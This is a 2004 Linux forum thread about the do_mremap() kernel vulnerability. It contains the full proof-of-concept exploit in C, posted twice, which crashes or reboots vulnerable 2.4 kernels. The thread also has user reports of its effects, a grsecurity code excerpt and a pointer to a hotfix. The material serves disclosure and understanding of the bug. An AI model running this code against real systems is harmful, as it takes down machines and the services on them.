View previous topic :: View next topic |
Author |
Message |
Bash[DevNull] Guru
Joined: 10 Oct 2003 Posts: 333
|
Posted: Tue Jan 06, 2004 9:36 am Post subject: mremap test util :-))) or kill you Penguin |
|
|
/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
int main( void )
{
void *base;
base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );
fork();
return( 0 );
} _________________ Biomechanical Artificial Sabotage Humanoid |
|
Back to top |
|
|
Bash[DevNull] Guru
Joined: 10 Oct 2003 Posts: 333
|
Posted: Tue Jan 06, 2004 9:42 am Post subject: |
|
|
Heh, for stable (x86) 2.4.22-gentoo-r2 kernel with GRSECURITY PATCH don't work.
I have no time to rewrite and test util, but i think it can be...
Alll in this small code...
#ifdef CONFIG_GRKERNSEC_PAX_SEGMEXEC
if ((current->flags & PF_PAX_SEGMEXEC) &&
(new_len > SEGMEXEC_TASK_SIZE || new_addr > SEGMEXEC_TASK_SIZE-new_len))
goto out;
#endif _________________ Biomechanical Artificial Sabotage Humanoid |
|
Back to top |
|
|
drspewfy Tux's lil' helper
Joined: 13 Dec 2003 Posts: 125 Location: Mexico
|
Posted: Tue Jan 06, 2004 11:14 am Post subject: i cant install lsof and login |
|
|
I compiled the exploitt..
and.. when i run it..
./mremap
my system got rebooted, my sistem rebooted suddenly in 2 seconds..
why ??
doesnt give root ??'
my kernel is
2.4.20-gentoo-r5
and i tried with other kernell in other system and i got the same,,
rebooted the system
with the r9.
well see ya
=)))
i hope you some help..
or how to fix the vulnerability |
|
Back to top |
|
|
Bash[DevNull] Guru
Joined: 10 Oct 2003 Posts: 333
|
Posted: Tue Jan 06, 2004 11:59 am Post subject: |
|
|
It is not exploit that give you root priv. It is proof-of-concept exploit, it is mean - show that you system have this bug and only.
Hot-Fix can be found there https://forums.gentoo.org/viewtopic.php?t=121529 _________________ Biomechanical Artificial Sabotage Humanoid |
|
Back to top |
|
|
drspewfy Tux's lil' helper
Joined: 13 Dec 2003 Posts: 125 Location: Mexico
|
Posted: Tue Jan 06, 2004 12:22 pm Post subject: |
|
|
YES but when i try the exploit
i get rebooted the system
....
:S
weird |
|
Back to top |
|
|
fleed l33t
Joined: 28 Aug 2002 Posts: 756 Location: London
|
Posted: Tue Jan 06, 2004 12:30 pm Post subject: |
|
|
Do you mean that the hotfix that Bash pointed to is worthless? |
|
Back to top |
|
|
Simba n00b
Joined: 08 Nov 2002 Posts: 60
|
Posted: Tue Jan 06, 2004 8:43 pm Post subject: |
|
|
It doesn't work with my kernel although my kernel is an old 2.4.20-xfs-r3
kernel. ./mremap just quit with Segmentation fault, thats all. |
|
Back to top |
|
|
RAPUL l33t
Joined: 29 Dec 2002 Posts: 664 Location: Valencia (SPAIN)
|
Posted: Thu Jan 08, 2004 4:38 pm Post subject: It doesn't work... |
|
|
It does nothing for me.
I am still using an old gentoo-sources-2.4.20-r7 which has been without rebooting 80 days... _________________ Entropy rulz world.
Redundancy sux.
World is full of redundancy.
World sux. |
|
Back to top |
|
|
donwimani n00b
Joined: 05 Mar 2004 Posts: 19
|
Posted: Fri May 28, 2004 7:48 pm Post subject: understanding the code |
|
|
Hi,
I was trying to understand how exactly the code makes the kernel crash.
sys_real_mremap() is declared by the code:
Code: |
static inline _syscall5(
void *, real_mremap,
void *, old_address,
size_t, old_size,
size_t, new_size,
unsigned long, flags,
void *, new_address );
|
and by defining __NR_real_mremap to __NR_mremap
Code: |
#define __NR_real_mremap __NR_mremap
|
a call to real_mremap() will result in a call to ENTRY(sys_call_table).__NR_mremap
which is the sys_mremap system call
but this call only takes 4 arguments so when using
Code: |
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *) 0xC0000000 );
|
this would actually be the same as
Code: |
mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED);
|
so I thought...
my consumptions don't seem to be correct
Can anyone help to understand the code?
regards
I'll put the full code here for reference
Code: |
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
int main( void )
{
void *base;
base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );
fork();
return( 0 );
}
|
|
|
Back to top |
|
|
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
|